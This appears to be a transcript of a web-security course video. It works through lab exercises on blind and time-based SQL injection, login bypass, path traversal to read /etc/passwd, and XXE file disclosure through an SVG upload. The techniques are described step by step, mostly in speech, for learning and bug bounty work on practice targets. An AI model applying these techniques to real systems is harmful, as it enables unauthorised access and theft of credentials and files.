just to find out that there was no um, SQL injection there. But we can send this to repeater, because what you're looking for is a request with this tracking ID. You need that tracking ID because that's where the SQL injection is going to be. So we'll send this, and you can send it a few times. And what I'm looking for is this content length. I want to make sure that it does not change. And sometimes you will send this on some web applications and it will change every time, no matter what you do, the exact same GET request. But for us, in our case, it stays the same, which makes this lab much easier to solve. And when you have this tracking ID, you can also check it as well for the SQL injection. And so you send it and you can see the content length has changed. So it's 4906, and you send it, and now it has changed. This tells us there is a possibility of a SQL injection. So what we're looking for is what has actually changed in our response. So I actually have already gone through here. What I like to do when I come across a different response is to copy this and take it to a text editor. I think it's easier to read through and to look at, and I also can search, which we are going to do right here. So when it comes back without any modifications, we have the, let's send this again, we have the welcome back is on the page. When we put in our single quote to try and provoke an error, the welcome back is gone. So you can see we have 0 matches right here. And so with our 0 matches, we want to send a true statement to make sure that we can really add on to this query. So we go or 1 equals 1 and then comment this out. That comes back as true. So we know that we can give some kind of request and see what comes back true, what is actually true and is on the database will come back with this welcome back, which is what we're going to have to pay attention to. And so we'll go ahead, because we've already been told what the table name is and the column names, we can go ahead and start to look for information from this table. So we'll type in our usual union select, and this is where it changes, because we're going to now add a character into our query. So we're going union select from, and then we're going to go to our users table, where the username, username is equal to, and then remember we were told we need to log in as administrator, so the username we're looking for is administrator, and we are going to go ahead and send this and see if it comes back as true. And it does, and I'm very happy it does, because that means you guys don't have to wait for me while I look for my typo. So we have this, and now what we can do is we can actually add on to it, and we can look for the length of the password. And so you can come in here and you can look to see how long the password is, and you can pull down the length of the password, and you can come in here and you can go plus and plus length, and then we add in the password, and then you would add is it greater than, and then you can start right here and you can start sending to see is it greater than 1, is it greater than 2, is it greater than 3, and you can send this to the burp repeater
and just continue seeing, is it greater than, and looking through this. What I am going to do is I'm actually going to skip this process for the sake of time, because we're going to have to go into a burp intruder and start looking for the actual password. And so what we're going to do is we're going to send this query over to the intruder and see what we can pull back. So I'm going to go ahead and take this query here, and what we're going to do is we're going to take this and we're going to add into it the characters that we're looking for. And so you would add in that you're looking for the first character and only one character inside the query, and then you're going to start with the character A. Now this, at this point, I'm sure if this is the first time you've ever seen anything like this, it looks very strange, and it is going to feel really strange doing things like this. It's new, and it's kind of confusing. So we'll send this not to repeater, to intruder, and so we have this new string that we're sending. So we have our normal union select, and then we have a string from users where the username equals administrator. So we're looking on the table name users under the column username for the administrator's password, and we are looking for the actual password at this point. And this, actually, I just noticed, we're not looking for the length of the password. We're going to be looking for the substring. So we'll come over to intruder, we'll look at our positions because we've already sent this over here. We'll clear where it wants us to start querying, and we are looking for the substring in the password. And so we will go ahead and set this up. What we do at this point is, as we set up our payload, you will add the whatever those symbols are to tell it this is where we want to shoot through, or we're going to use the cluster bomb. So this is where we're going to be going through and sorting to make sure we have the right characters. And then we'll add right here, because if you remember, this selects the first character, and then it's going to go through the first character for all of the characters that we give it. But then we want it to go through the second character as well, and then the third and the fourth and the fifth, until we reach the end and we have the password. And I'm using I don't have the professional version of burp on this system, and so this is actually going to go really slow. And once it starts, I'm going to go ahead and pause the video so you don't have to wait for it to pull down the password, because it will actually take a while without the professional version of burp. And so what we're going to do now is we're going to set up our payloads. And so if you remember, payload 1 is going to go to this position, and payload 2 is going to go to this position. So the first payload, we're going through numbers. So we will find numbers, and we're going to go from 1, and this is when I guess it would have been helpful. I'm just going to go really far. This is when it would have been helpful to see how many characters were in the password, so you would have known how far you needed to go. And then we're going to go by a step of 1. So it's going to go up 1 character once it goes through all 30 characters. And then position 2, we are going to be going through the alphabet. See if it has the alphabets in here for us. I believe it does. Manually add these in, it would be a lot easier to go through these without having to do this, but I will edit this out so you guys don't have to see me add all of this in. Alright, I believe we have all of the characters added in. So now what we can do is we can go ahead and start the attack. And we can say OK. And now it is going to go through and start working through all of those characters. So position 1 and A, is position 2 and A, is position 3 and A, and it's going to go through and check every character for each position until one returns true. And one of the things, not sure this works without having the pro version, we have the welcome back that we can grep on. And we'll actually just wait. We'll check the content length. I'll go ahead and cut the video and wait till we receive back the information from our query. Okay, I have gone ahead and cut the video in the middle of where we were after starting the attack, and you can see that it's been running and we've pulled down some of the characters that we've needed. One of the things that might be helpful, if you copied exactly what I had typed into the payload or into the query right here, I actually had a error, and I had to go through and change that and fix it. And then that ran for a little while, and then also my computer fell asleep while running this, and it closed out my query, and so I had to restart it. And so this has been running for what feels like forever. And so I'm going to go ahead and we're going to stop it here, and I'm going to show you a little more manual way. And it's also a lot faster because if you can see, it's sending one query each time to the server, and it's very slow, anywhere from 10 to 15 seconds. And it's because we've sent so many. And this is one of the things Burp does in order to get you to buy Burp Professional, so that it'll send them really fast. So they've throttled this down, but I'm going to show you a way that you can kind of get around this and send your queries a lot faster. And before we start that, I kind of wanted to show you our positions just in case it wasn't clear. Remember, in our query, we are selecting from the users, the table users, where the username is just the column, and we're looking for the name of administrator inside the password column. And so we're sending, this is the first character in the query. So this would be position number 1, and then it'll change, and it'll go position number 2, and then position number 3, and it will send A all the way through, however many we set those positions, 1, 2, 3, 4, 5, 6, to see if an A comes back as true in any of those cases. And if it comes back true, we'll see something like this. You can see the length has changed and the welcome back is present in the response. And then once it goes to all of position 1 for all of the alphabet, it will go to B, and then it will start over and it'll continue and it'll go through like that. This is a very automated way. We don't have to really do anything. We just set it up and let it run. But if you don't have Burp Professional, this can take a very long time. And one thing before we go ahead and I show you how to organize this to find the password is that in order to get this welcome back to show up, what you do is you can check in your response, and you can have your welcome down here. And if you can see these, it matches. The welcome has come back, which means it's true, and we have a match. For these down here, it is not true, and there is no match. And so we can sort out the true characters that exist and in which position they exist. So there's a G in position 2. There's a G in position 15. We have a K in position 8. And so on. And so we can know this is where there's characters and this is how it's true. But in order to get this welcome up here, you have to go into your options. You will come down, so it'll start you up here. You'll scroll down to grep match. You will clear what's in here and you will add welcome. You'll get a little pop-up. You'll just click OK. And then it will bring you back to your results, and it will look like this. And what you do is you just click this and you click it again until we have the arrow facing down, and it will have all of the characters there for you as it runs. Now, the way I like to sort out the password is to have a text file open, which is right here. We have our text file. We'll delete this, and we'll delete this, and we'll paste this in. So what we have here, we'll also delete these because these are just our query numbers on how many GET requests were sent to the server. And I think the less numbers we have, the easier this will be to understand. So I'm going to go ahead and delete all of those. So this, if you remember, let's open this back up and have our text file. This is the position from payload number 1, and this is the character that has come back in payload number 2. So what you would do is we'll just pretend this is 1, 4, 2, 3, 5, 6, and I hope you're getting the idea of what's going on here. So if not, I'm going to explain it. So this will make a lot more sense so we don't have random numbers really stretched out. 10, 11, 12. So let's say this is what we've brought back, and the query is finished, even though we know it's still running and it's going to take 5 more hours for it to finish running. So what we'd do is we'd have our password equals, and you'd come here and you'd go, okay, position number 1 is I, and then we'd look for 2. 2 is O. Position number 3 is a K, and then position number 4 is an I, and position number 5 L, and position 6 is a G, and then you'd go along and you would just continue doing this all the way through. So we go 6, and then we go 7, and then 8 is a C, 9 is N, and by the time you've gone through all of this, this is your password. And so we were told that the username is administrator and the password is what we're pulling down right here. And we'd come over here, we'd go to our lab, and this is where we would come in, we'd click login, you would use administrator, and then this password that we have just pulled down. So if you want to let your intruder run forever, because it is really slow, especially once you get past about position, after you get past request number 30 to 35, it really slows down. So I'm going to go ahead and close this out. Click OK. And I'm going to show you a little bit of an easier way, a lot faster way. It's not easier, but faster. So what we'll do is we're going to manually go through and we're going to change this position. And I'll show you how much faster this is, but you have to be a lot more involved. Before you could just let it run, and now you're not going to be able to let this run. So I believe we'll go to sniper. So we only have one position instead of cluster bomb, which is for more than one position. We'll come to our payloads, and we're going to have one, and it's going to be a simple list. And if you remember, we're going to do the same thing as we did before, and we're going to run all these characters in the alphabet. And so I'll go ahead and punch all of these in, and we'll run through these with the sniper attack. And let me check our payload, or our options, our target position. There we go. And we're going to go ahead and let this run. Oh man, bummer. I accidentally, we'll clear that. I accidentally added too many. Okay, so we'll start the attack and we'll click OK, and you'll be able to see how much quicker this was going than it was before. I am not real sure why this is not starting. But while that is going, I'll show you what happened. So you saw earlier how we had the length was different, and we had brought back the response length, and we knew which character it was, just in case this doesn't start for me and it is not working. What we'll do is you would come back to burp, and you would change, you would leave this as A, and then you would change this, or you would leave this exactly how it is with the payload options, and you would change your position right here to a 2, and then you would change it to a 3, and then a 4 and a 5. And what happens is we're doing the same thing, only we're doing it manual. So we're running the alphabet all the way through position number 1, and then we're going to run the alphabet all the way through position number 2. And in your payloads, in here you can actually add numbers and characters which might show up in a password in a capture the flag situation. And so you wouldn't just be running through the alphabet, you'd be running through characters as well, but you would go through position number 1, position number 2, position number 3, and usually in burp, when it does work, it runs much, much faster. But for some reason, I can't get it to run at all. But that is the process of how to do a blind SQL injection, and I will see you in the next video. Okay, we are going to look at the blind SQL injection with time delays, this one right here, and this is going to be pretty important for you to learn, but it's also pretty simple to understand. The reason you're going to want to know this is it is going to be used as your proof of concept when you submit bugs to the bug bounty programs. Most of the programs, I would say all of the programs, don't actually want you to pull down any information for security purposes, and so they're not going to want you to pull down table names, columns, or anything like that. And so what you'll do is, if you find what you believe to be a SQL injection, you will inject a time delay, and then you will submit that to the program. It lets them know that they have SQL injection, you're allowed to run commands, and you have not pulled down any information. And if they want you to do something like discover a table name or columns, they'll respond and let you know. And so the time delays are going to be really helpful for you in your bug bounty hunting career. And so I actually already have it open, and they're pretty simple. But I also want to look at the cheat sheet because they're going to be different. And we're only going to be looking at this one right here. The blind SQL injection with time delays is really simple to the one with conditional responses, which we just looked at. The only difference is you would be running a case then statement, which if you're a programmer, it's like if then, and you're going to be saying if this is true, then sleep, and rather than if this is true, we're looking at the welcome back like we were in the previous one. It'd be different. So it would just sleep 10 seconds or 5 seconds. 10 seconds is kind of a long time to wait. So what we'll do is we'll come in here and you can open this one up. Oh, I closed out of burp. I'll go ahead and pull that open. Yeah, if you remember from the previous lecture, I was having trouble with burp. I couldn't get it to run what I was trying to get it to run, and I had to close it out. So we'll go ahead and let that open, and we'll look at the cheat sheet while this runs. So with the cheat sheet, these are all going to be different. So you'll have to run this to get your program to sleep. For your delay with Microsoft, it's going to be like your syntax is going to look like this. For PostgreSQL is going to look like this, and MySQL is going to look like this. And so each one is going to be a little different, and you might have to just try each one and see what comes back for you. Okay, so this is, we're going to have to solve the lab, we need it to sleep for 10 seconds, which is kind of a long wait, but 10 seconds feels like forever when you're waiting for a response to a GET request. So we will go ahead and turn the interceptor on and open this up. I think I clicked in the wrong spot. Oh, there's a tracking ID. We have one right there. And this will look, let's see if it says it's blind, so it's not going to have anything for us. I'm actually going to go ahead and go to an item so that I know I'm in the right spot and you guys don't have to watch me fumble around like you are right now. So we'll go ahead and
send that to repeater, and the SQL injection that we're looking for with the time delay is the PostgreSQL right here. So what we'll do is we'll use this syntax right here, the PG sleep 10, and we're going to have to concatenate it to our query. So it's just two pipes, which is just above your enter key or your return key if you're on a Mac. And then you just type in the syntax exactly like you just saw. And then we don't forget to comment out the rest. And that should take 10 seconds for our response to come back. And once that response comes back, we should have a solved up here. And so the time delays are really simple. They're really easy to run, and this is how you do it. I'm not sure why that didn't come back as solved. Maybe we have to go ahead and forward this. There it is. There's the solved. So they're really simple to run. They're really easy proof of concept. You can change this to 5 seconds if you're impatient like I am, and wait just 5 seconds instead of 10, but you have to do 10 here to solve the lab. And so this will be really helpful for you. They don't really have any more practice labs for this other than the one that we saw, where you're going to basically go through and do everything we did in the previous lesson, only with a case then statement. To see if the query is true, it will sleep for the amount of time that you've put in, and if it's not true, then it's just going to come back immediately. And with that, we have just a few more SQL injections that are common in capture the flags, but very uncommon in a real world scenario, and we'll go ahead and look at those next. Okay, we are going to try our final SQL injection. I've gone ahead and opened up OWASP Juice Shop, and this is where we're going to try our final SQL injection. So these login user emails and the passwords are saved on a database. And so what we're doing is putting in our single quote and looking to see if we can log in. So if you want to try this, here you can just come over here, go to the account, click on login, and you will be brought to this page. And so what we're doing is, when you're trying to bypass a login and you're just trying to send it a true statement. And so what we do is we close off everything that comes before this single quote, and then we put in our own true statement, and it will log you in as the first account within the database. And so it's really simple. You would just type in or, and then we put a true statement, which is just 1 equals 1, and then we comment out the rest of the query. And so what you do on your password, you can literally type anything you want, because it doesn't matter. This is commented out from here. And so we have our true statement, and then we hit login, and we have now logged in as the administrator. And so you can actually take this and try it in our labs we were doing on PortSwigger. You can come down here and you can click the last SQL injection that has allowing the login bypass. And so you can come in and you can open the lab. I actually have already opened it, and you can try it right here. You can click on the login and you can try to log in the exact same way we just did. I'm going to go ahead and let you try and figure this one out on your own. It's really simple. It's actually the exact same as the OWASP Juice Shop that we just did. So I'm confident you can figure it out on your own. And if you have any questions, you can let me know in the comments below. Okay, we are ready to start directory traversal.
We have talked about this just a little bit earlier when we talked about navigating through files, and we talked about going through files such as this. So we would cd into the desktop and it changes us. We change into that directory. And so we're able to go between directories and go into different files. And the way we go backward, if you remember, if I wanted to go back to my home, I would just go back one directory and that takes me back. A good way to practice this, and maybe you've done this earlier, is to open up your home folder and just up here in your little search bar, you can practice going backwards or you can practice going forwards. And so we would just be going forwards like this, and then we can go forward again and we can go into our desktop. And then if we wanted to go back, we would just do 2 dots and a slash. And so in directory traversal, we will be going through files only in our browser. So we would be going backward through here. And we talked about this a little bit in the previous lessons. And so we're going to go ahead and open up our Portswigger in our labs, and you can scroll down until you find the directory traversal, and then we're going to walk through a few of these manually, and then I'm going to show you a tool that does this for you. And I will pull up a directory traversal that is found on HackerOne, just so you can look at it and you can see just that these are not something that's lost out there and somebody's found them all. Actually, recently, I would say within the last 2 years, someone found a bunch of directory traversals. They were able to pull down files that they should have never had access to on the Department of Defense. And so if you would think of any organization that's going to have good security, you would think it would be the DoD. And these were found recently within the last 2 years, directory traversals on the DoD. And so it's out there and they happen. I've actually found a few of them, and we'll go through them manually, and then I'll show you a easy way to fuzz through with a tool that will actually pull down and tell you where a website is or a web application is vulnerable, and exactly which exploit they used to prove it's vulnerable. So we'll do that after we go through some of these manually. And so we'll start the first one in the next video. Okay, we are ready to go ahead and open up our first lab, and you're going to be able to see just how easy these are to find manually, I think they're really simple, and anyone can go and try these with really knowing very little about how the web application or locating files works in general. You can pretty much find these straight off your very first day. So we'll go ahead and access the lab and turn this on, turn on our lab. And while that's opening, there's a few different ways to look for these. Probably the most common is going to be up here in your address bar. You'll come up here and this is where you'll search for them. And I'll just go ahead and show you. What you would do is you'd pull this open and you'd hit your slash and you'd go dot dot slash dot dot slash, and then you would hit enter and see if it can take you back any files. But it is not going to work for us in this bar. We're actually going to have to use burp for this. And so we'll go ahead and turn it on, turn our intercept on, and we'll view details. And so what I'm going to go ahead and do is send a few of these requests to repeater, because I'm not actually sure where exactly we're going to find the traversal. So we'll go ahead and send that to repeater as well. And I think that's it. So we'll go ahead and open this. And so if you remember how to go backward in our files, we'll actually start with the first one we sent. We'll go ahead and delete this. And so we're looking for the product ID, and you would go dot dot slash dot dot slash. And then what we're looking for, if you remember in the lab description, is the Etsy password. And so we just type in etc/password, and then you can send it. And it says we get a bad request. And so we'll go a couple more and see what happens. Okay, so we're getting a bad request. What we'll do is we'll go over to our other get request, and we'll go ahead and do the same thing. I like to go ahead and start out just like this, and then add to the path traversal as we go. And so I just go just like this and see how far we have to go before we can actually find the files. In this case, before we solve the lab. And we'll try one more. Oh, I have a typo. Okay, so there it solved it. So it goes back to the root folder, and then it goes forward into this file, and then it'll go forward into the password file, and it pulls down for us information that we should not be able to have access to. And so for us, this should solve the lab for us. So each one of these just goes back one file, and it goes back until it hits the root folder, and then it'll go forward into this directory, into this file. And that will give us information that we should not otherwise have access to. And I'll see you in the next lesson. Okay, we are ready to go ahead and solve our second lab on path traversal. So you can go ahead, I think with what you have learned so far in the very first lab, you should be able to solve the second lab on the directory traversal. So if you want to go ahead and give it a try, you can open up the lab, which I've already done, and you will be looking for the same file we were looking for last time, the Etsy password file, and that will solve the lab for you. And so you can go ahead and pause the video now and see if you can solve this challenge. Okay, how did that go? Hopefully you were able to solve it without any trouble. If not, we're going to go ahead and walk through it now. We'll go ahead and turn on our interceptor, and we will click one of the view details just to make sure we can pull down the same get request we had last time, which was not the product ID. It was the image file name. So we'll go ahead and send that to repeater. And while we're over here, we're going to start out just the same way we did last time. We're going to come in here and start with our Etsy password. And then as necessary, if we need to, we'll go ahead and add in the dot slashes. But we always start at the beginning and go forward or go backward if necessary. So we'll go ahead and send this. And it came back on the first try. So hopefully you were able to solve that challenge because they're going to get a little more challenging to do manually, but not all that difficult for us. So I will see you in the next lesson, and we will continue with the path traversal. Okay, we are ready for the third challenge that we're going to be looking at for the path traversal. And this one, we're actually told what's happened. So we'll go ahead and open up this lab, and we'll see our instructions here. And we're told that the sequence is stripped away non-recursively. And so what we will have to do is modify the attack just a little bit, and pretty regularly, especially with cross-site scripting, you will see developers that know of a way or maybe a few ways that an attack can be performed. And so they'll just go ahead and strip out just specific elements or sequences within an attack or a payload so that they won't go through. But there's almost always another way to pull this off. And so actually in this lesson and the next one, we're going to be able to observe just how you change payloads, and really in bug bounty hunting, what you're going to be doing is a lot of trial and error until something works. And so we'll go ahead, open up this lab, and once you're in here, you will click View Details after you've turned on your intercept. We'll go ahead and turn that on. And my son would think this is the coolest toy ever. And so we'll go ahead and view the details. We'll get our GET request that we need right here. We'll send it to repeater. We'll turn the intercept off. And once we're in here, we'll go ahead and we can start out with the Etsy password. And then we'll send this, and it comes back with a bad request. And so you can go ahead and try going back, and it comes back with a bad request. And I actually know what is going on because we're told that the traversal sequence is stripped away. So what we'll have to do is try something different. And so what you can actually do is go 4 dots with 2 slashes. And then this is going to be a different process in pulling down the Etsy password file. So we'll send this, and then we will 1, 2, 3, 4 continue going, and we are able to find the file we need. Now, when it comes to remembering all of these different ways that you can try and find a directory traversal, it is not necessary to try and remember these. I'm going to show you a tool that actually does all of this for you with hundreds and hundreds of different ways to pull down an Etsy password file. And so I'm just showing you manually how this works so that you know what's going on and you know how to find these, just in case you're not allowed to run a scanning tool or anything like that on a specific web application. But you do not need to try and remember all of these different ways to pull down the Etsy password file, because you will have sources available that can do it for you or remind you exactly how to pull off these attacks. So with that, we're going to look at one more, and then we're going to look at our tool that will do this for us. So I'll see you in the next lesson. Okay, we are going to be working through our final path traversal before we look at how to do this with the automated tool. And so you can go ahead and open up this lab, and in here we can read our instructions and exactly how to pull this off. And so we're told that this has URL decode in it. And so this is actually very similar to a exploit that was pulled off, and I came across this not too long ago when I was looking through path traversals and how they were pulled off on the Hacktivity. And so we have, this was done June 9th, 2018, so quite a while ago, a couple years, but this is going to be pretty much the exact same exploit we're going to be doing in this lab. So just to show you that these labs aren't just theoretical, but they actually do help you perform these exploits. And so you can see here, this is the URL encoding. And so a simple way to look at URL encoding is you can come over here to the decoder. You can type in some gibberish, and then you can encode it as URL, and you will see the URL encoding pull down here. And so what we are going to be doing is doing something very similar to what this guy has done here. And you can actually see he actually pastes, it pulls down the file that he should not have access to. So what we are going to do is come in here, you open up the lab, click access the lab, same as we've been doing in the last few lessons. We'll open up burp, turn on the intercept, and we will view details of one of the files. We will look for the GET request with the image file name, send it to repeater. And now what we're going to do is very similar to what we just saw. So we'll start out just like normal. you can go ahead and send this, and then we are going to type in the URL encoded version because it's going to decode it for us, which is %252F, and that should pull it down for us. And we'll go ahead and delete that because it's encoded in there, and so we can send that. I'm going to do, rather than type this, is I'm going to go ahead and copy it and then paste it, and then send it, and then paste it, and then send, and there we found the file. And so you can actually really easily see how this is very practical. Here we're practicing it. Here someone actually pulled it off on a live website. And so if we come in here and we turn our proxy off, we should solve the lab. And so in the next lesson, you are going to be required to open up Juice Shop, because this is the URL we're going to be using to pull off the attack on our automated tool. So you can go ahead and open up Juice Shop and get it running, and I'll see you in the next lesson. Okay, we are going to be looking at the automated way to find directory traversal exploits. And so you can go ahead and open up a terminal and have Juice Shop open and running. And just to make sure you have the tool installed, you can come down to your terminal and you can type in sudo apt-get install. It should look exactly like this. And then you will hit enter. It will require your password, and you can go ahead and type that in, and it will run, and it might ask you, are you sure you want to install? And you can press Y and then hit enter or return if you're on a Mac, and it will install. And so the way to run this tool is very, very simple. You would just type in .pwn, and then we will give it the parameters that we want it to follow. So we'll just type in .pwn, and then we will go -m, and this is, I actually already ran it just to make sure it would run on our local server. And so this is what you will type in. You will type in .pwn, and then you'll flag m http, and then you'll flag h, and it's our local host. And so I actually just came up here and copied and pasted the page I was on, and when you hit run, it will run for us. Oh, it did not run for us because we have to run it as sudo, as our super user. And now it is running, and it'll ask us, press enter to start the testing, and then we'll go ahead and hit enter. And now you can see, look, it is running all of those for us with the ///, and then it encodes it, and it just runs through, and it tells us even where it's vulnerable. Now this web application is vulnerable, I think it's vulnerable to all of them. They did not do a good job when building the web application for making it secure to this attack. And it will run, and there are hundreds of different ways to send. There's the one we just saw with the %252F, and it runs it for you, and it'll tell you. For us, it would have been right here. We would have had 3 paths to go back before it goes forward into the Etsy password. And so it would have found it right here. It would have flagged it as vulnerable. So now you can see just how easy it is to run this with this tool. And you can go ahead and hit Command C to close out of it so that it'll stop running. And it might have actually went ahead and solved a challenge for you. If it didn't, you can go ahead and type in //// really any of these, because it says it's vulnerable to them, and then type in etc/password, and it should pull down. I think I already solved the challenge. It should pull down that we have accessed a file that you should not have had access to, and so that will solve that challenge for you. It's pretty simple. Running this tool is really easy, and it takes a lot of the manual testing that we just did out of account for us, and it will run hundreds of different ways to find a path traversal.
And that is it for directory traversal. It's pretty simple, and .pwn makes it way easier for us to run this vulnerability and to scan for it and to fuzz and see just where this is at. So with that, I will see you in the next video.
Okay, we are going to be starting a new attack. This is on the XML software, which is used for storing and transporting data. It is what we're going to use it for is to pull down information that we should not have access to. This is the fourth most common vulnerability, and so it's good to learn. It is not a very complicated exploit. It's actually pretty simple to pull off, especially once you kind of know what you're looking for. And it is most commonly found on older websites that may not be kept up yet, or you can find older domains that companies are not regularly using or have been up for a while. And so on OWASP's top 10, it is recognized as the fourth most common vulnerability. So I would strongly encourage you to go through with this and see what you can find. We're going to go through, there's some really complicated ways to pull off an XXE attack, but we are going to be looking at some of the easier ways. So let's go ahead and get started. So one of the things I love about a couple of the attacks we're going to look at in this course is that the payloads have already been made for us. And so you can actually come over here to Google. I just Googled XML XXE payloads, and I opened a few GitHubs, and you can click on them and you can just look through them, and people have already written the exploits for you. And what's really nice is they tell you what each one is used for. But I like to use the OWASP guide, and so we can click in here, we can scroll down, and they do the same thing: remote code execution, the etc password, and they tell you exactly how to pull off these attacks. So what I'm going to do is I'm going to go ahead and copy this one, and we will walk through it. So we'll go ahead and make a new file and paste it in here. And so what we have here is the XML encoding. This is not always required, and it does change. And so you will have to pay attention to the encoding. A lot of time you can find the encoding by simply sending a GET request to the server, and it will come back and it will tell you the doc type encoding. And you can also inspect the website. So you can come in here and you can come to the web application and you can click inspect element, or you can go view source. And sometimes they will have written in here the doc type. This is our HTML boilerplate. But you can come in here and go to view page source, and sometimes it'll have written in there the XML encoding type that they're using. And so you can look for this. We'll probably see it later, and if I remember, I'll point it out to you. So what we have going on here, where did my file go, is the doc type, and this is what we're going to be sending to. The doc type name doesn't really matter. What matters is that we're able to call the system that we're trying to exploit. So we're coming in and we're giving this a variable. We are calling the system, and this is the file we are calling, and we're actually going to call the etc password file. So you can go ahead and change that. This is what we're going to be trying to pull down to solve the challenge. And so we have this set up, and then this right here simply calls the system and the file we're looking for. And so if you are familiar with programming, I like to think of it as when you write a function and then you later call the function because you want it to run. And that's essentially what we're doing. So we'll go ahead and save this. And you don't actually have to make a file. Sometimes you can just copy and paste this right into Burp, and it is easier than what we're doing right now. But for the sake of solving the juice up challenge, we have to do this through a file upload. So we'll go ahead and save and close. And then the way we solve this challenge specifically, we come in here, we go to complaint, and we are going to fill this out. We will browse. We're going to come down to this corner and go all files. And I must have made that in a different location, that file. I did. So I'm going to have to remove that. I'm going to change directories over to the desktop so that I have the file in a location it's easier to get to. And then just gedit, paste that in, change to, let's see, password. Save that. Now we should be able to find that file. Here it is. We'll go ahead and click open, and we'll need to run burp. It says we've already solved the challenge. Well, I guess we know it's going to work. And next, don't update. I am sure. Start. I actually turned burp off just a few minutes ago when I was browsing through the internet, so I will come back in here and set this up. Our intercept. And we'll come in here. If you remember how we set these up, scroll to the bottom. We already have this configured, so we just go use manual configuration, and burp should be going. Now, intercept is on. We will, I think I already submitted it, load the file back up so we can get a look at what's going on here. Open, submit. Okay, here is our file that we uploaded. We're going to go ahead and send this to the repeater. And when we send this, we should be able to find the file that we are not supposed to have access to. Let's forward that on. Okay. Seeing, oh, there it is. It's just definitely not formatted very well. So right here is where it starts, the Etsy password file. And so we were able to pull it down. It's over here. It just is not formatted in a very great way for us to see it. But here it is. I believe I have shown you enough that you should be able to solve the first XML XXE challenge. And so I'll see you over there, and we'll read the instructions, and we'll see if you can solve it without any help. I'll see you in the next video.
Okay, we are here on Portswigger, and we are going to continue our study through the XML external entity injection. And we're actually, since we just saw a file upload on our Juice Shop application over here, we're going to go ahead and try and do another image upload. This one's a little more hands-on and a little more difficult. So I actually went through just to make sure I had the proper payload or the ability to show you exactly how I thought through this. I actually went ahead and already did this, and I will be honest, it probably took me at least 45 minutes to solve this challenge. And so a lot of these labs and a lot of bug bounty hunting and web application testing is going to be trial and error. And I'm going to walk you through some of the stuff I did and some of the mistakes I made, but also just to show you this is how I thought through, this is how I changed the payload, and this is just how you're going to have to figure out what works for you. And you're going to spend time Googling around trying to figure out solutions. There's actually YouTube videos of professional bug bounty hunters, full-time bug bounty hunters, that tell stories about them finding different exploits, and one of them is an XXE, and the tester actually talks about how it took him a significant amount of time and a significant amount of Googling around until he was able to exploit this on a live web application. So be prepared to do a lot of testing and a lot of editing and changing your payloads. The good thing is a lot of what you need already exists on Google, and you just have to know how to read and then basically copy and paste. And so I went ahead and I already opened up the lab, and here it is. This is when it's open, and you can go ahead and open up a post, because we're actually told this is an image file upload. And so we just come in here, you click around until you find your file upload, and the file upload is a great place to test for the XML external entity injection. And so what we do is similar to the last time. We just come in here, we fill something out in here, we give ourselves a name, and then we come in here and you just can make an email, and it requires a website. So I went ahead and put Google, didn't spell it right, it'll be okay. Now we actually have to make our payload. And so what we'll do is we'll come into our terminal just like we did last time. Make sure you're in your directory. I think, see if I can make this bigger. I forgot the shortcut for zooming in on my screen. We'll go ahead and zoom in. Control plus plus. Okay, so it was control. There we go. Make that a little bigger so you can see it. Okay, we'll come over here to our terminal. Make sure you're in the desktop and go over to Google, and you can go ahead, start browsing. Go ahead and type in your XML XXE payloads. We're actually told what file it will accept, which is the SVG. So if you go ahead and try and upload, which I actually did try, and I uploaded, and it will tell you you have an error, it will tell you have a problem when you send it to burp. And so we'll go ahead and I think this text file, okay, we made that earlier. We'll go ahead and send it and see what happens. So we'll open this up and we can post it. Right here would be our payload. Right here is our file name. We'll send it to repeater, see what kind of response we get back. And it says we have a bad request, file must be an image. So that tells us what we need to do is have the content type has to be an image. Our file name, I actually ran this as a JPEG and then a PNG and then finally the SVG, and I changed this to an image before I got this to come through, and it was not received as a bad request. So what we'll do is I'm going to start out just like I did when I walked through this, only I should be able to save us some time since I've gone through this now. So I had an XXE, I tried it with a JPEG, I tried it with a PNG, I tried several different ways before I went ahead and saved it as an SVG. I open this up, I already have this in here, we'll just delete this. We'll go ahead and make a new one. So you have a blank slate to start. What you should be able to do is to come to Google, and you know what we're looking for. We're looking for a very specific payload. We're looking for one that we can upload as an image. And so we need to smuggle in our payload and be able to send it in. So if you look at these, file disclosure, denial of service, and we can just read through these: server-side request forgery, encoded, and then we have the SVG. This is the one that we were looking for, and you can see we have an image here, and it gives us our image height. This is actually just a link to an image, and so we'll just go ahead and copy that, paste it over here, and we will grab I'm going to try it without the XML version. If it turns out we need to have an XML version, we can come back and grab that, but we need to have our doc type. So we'll come back up to one that we used earlier, which I actually think we grabbed out of the OWASP website. So we'll come back over here, open this one up, and we are looking for just a basic, just like this, just a basic XML exploit. So we come here, and what we need out of here, we'll try the version, adding in a version later if we need to. I don't think we will. But what we do need is we have to have a doc type, the file we're going after, and then we're going to have to call it. So we can come up here, we can paste that in. We have our doc type, which I did not copy all the way. So we have this in here. We were told it needs to be from the Etsy host name is where we're trying to pull this down from. So we'll go ahead and change this to host name. And we have our image here. We don't need to send this to a link because we are making our own. So we'll go ahead, delete that, and we will have to call the file, but we're going to do it a little bit differently, because what else we're injecting in here when we send this request, we are sending in actual text. And so what we'll do is come in here, and inside this tag right here, actually it's outside this tag, we're going to go ahead and we're going to create we're going to send in a text tag as well. And inside here you have to have the font size. We will have to have a X and a Y for the location, X equals and a Y equals, and these are arbitrary. You can put whatever you want in here and it should work. And we need a font size, and so I don't know, 30 sounds like a great font size, even though I'm fairly certain it doesn't really matter. We'll go ahead and move that up, and then we need to close, we'll have to close this out, and right here is where we're going to call right here our XXE. And the way we're going to do that is with our and symbol, and then we type in whatever we name this. You can actually name this whatever you want. We just need to make sure that we call it, and then we'll close out this tag. And this looks good to me. It looks good so far, so we'll just go ahead and see what happens. So we'll save this. Remember to save it, have a name, know what you saved it, so you know what you're calling. So we'll come in here, we'll browse, we'll go ahead and grab that file, and we will open it, and we're gonna send this. And I actually, if this works, it might not work because it might have a typo, but if this works, I'm going to come through here and I'm going to show you exactly what I did that landed me to this payload. So we'll go ahead and turn the intercept on. and we'll post this comment. And here's our payload. We'll send it to repeater, and then we'll send it and see what response we get. We have the 302 not found. What we'll do is go ahead and turn this off and post our comment. Thank you for your comment. Now, the way to know whether or not this worked is we inspect our page. We find our comment, which is actually back a page. We'll go back, and then we'll refresh. And then there's our comment, and it did work. It did go through. And the way you'd find it to solve this challenge is you go view source, you come down to your comment, you'll open it up. That wasn't my comment. We'll open up our comment. See, here's our file name, and there's the password to solve the challenge. So you'd copy this, and you would come up here, and you'd go submit solution, and that's your solution. Now, to get that answer took me a significantly longer amount of time than what we just walked through. So what happened the first time I made this? I left in this image, a tag, which caused me a lot of problems because it was going out to retrieve this 